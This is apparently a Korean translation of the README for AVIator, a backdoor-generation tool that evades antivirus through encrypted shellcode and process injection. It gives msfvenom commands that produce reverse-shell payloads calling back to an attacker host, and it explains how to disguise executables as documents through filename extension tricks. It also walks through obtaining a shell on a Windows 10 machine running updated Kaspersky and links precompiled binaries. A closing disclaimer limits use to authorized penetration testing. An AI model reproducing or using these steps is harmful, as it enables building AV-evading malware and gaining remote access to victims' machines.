
안티바이러스 우회 프로젝트
AviAtor가 NETCore 5로 포팅되었으며 UI가 업데이트되었습니다.
정보://이름
AV: 안티바이러스
Ator: 검사, 연금술사, 과학자, 마술사, 학자, 엔지니어이며 때로는 무에서 물체를 만들어낼 수 있는 능력을 가진 존재입니다 (https://en.wikipedia.org/wiki/Ator)
정보://목적
AV|Ator는 백도어 생성 유틸리티로, 암호화 및 인젝션 기술을 사용하여 AV 탐지를 우회합니다. 자세히:
[https://attack.mitre.org/techniques/T1055/]:
Portable executable injection은 악성 코드를 프로세스에 직접 (디스크에 파일 없이) 작성한 후 추가 코드 또는 원격 스레드 생성을 통해 실행을 호출하는 방식입니다. 주입된 코드의 변위(displacement)로 인해 메모리 참조를 다시 매핑하는 기능이 추가로 필요합니다. 이 방법의 변형으로는 반사 DLL 인젝션(reflective DLL injection, 프로세스에 자체 매핑 DLL을 작성) 및 메모리 모듈(memory module, 프로세스에 쓸 때 DLL 매핑)이 있으며, 이들은 주소 재배치 문제를 해결합니다.
Thread execution hijacking은 프로세스의 스레드에 악성 코드 또는 DLL 경로를 주입하는 방식입니다. Process Hollowing과 유사하게, 스레드는 먼저 일시 중단되어야 합니다.
애플리케이션에는 세 가지 주요 입력 항목으로 구성된 폼이 있습니다 (아래 스크린샷 참조):

중요: 셸코드는 C# 바이트 배열로 제공되어야 합니다.
기본값에는 notepad.exe(32비트)를 실행하는 셸코드가 포함되어 있습니다. 이 데모는 코드가 어떻게 구성되어야 하는지 보여주기 위한 예시입니다 (msfvenom을 사용하면 -f csharp 스위치로 쉽게 생성할 수 있습니다. 예: msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).
제공된 입력을 채우고 출력 경로를 선택하면 선택한 옵션에 따라 실행 파일이 생성됩니다.
간단히 말해, 실행 파일을 'pdf', 'txt' 등 '무해한' 확장자를 가진 것처럼 위장합니다. 예를 들어, "testcod.exe" 파일은 "tesexe.doc"로 해석됩니다.
일부 AV는 이러한 위장 자체를 악성코드로 경고할 수 있음을 주의하세요.
다들 아시겠죠? :)
완전히 업데이트된 Kaspersky AV가 실행 중인 Windows 10 머신에서 셸 획득
msfvenom을 사용하여 페이로드 생성
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
다음 설정으로 AVIator 사용
대상 OS 아키텍처: x64
인젝션 기술: Thread Hijacking (셸코드 아키텍처: x64, OS 아키텍처: x64)
대상 프로시저: explorer (기본값 유지)
공격자 머신에서 리스너 설정
피해자 머신에서 생성된 exe 실행
Windows:
프로젝트를 컴파일하거나 다음 폴더에서 이미 컴파일된 실행 파일을 다운로드하세요:
https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries
Linux:
리눅스 배포판에 맞게 Mono를 설치하고, 바이너리를 다운로드하여 실행하세요.
예: kali에서:
root@kali# apt install mono-devel
root@kali# mono aviator.exe
암호화 절차에 대해 Damon Mohammadbagher에게 감사드립니다.
이 앱은 침투 테스트 과정의 까다로운 과제를 극복하기 위해 개발되었으며, 이것이 이 앱이 사용되어야 하는 유일한 방법입니다. 시스템에 대해 사용하기 전에 필요한 권한이 있는지 확인하고, 불법적인 목적으로 절대 사용하지 마십시오.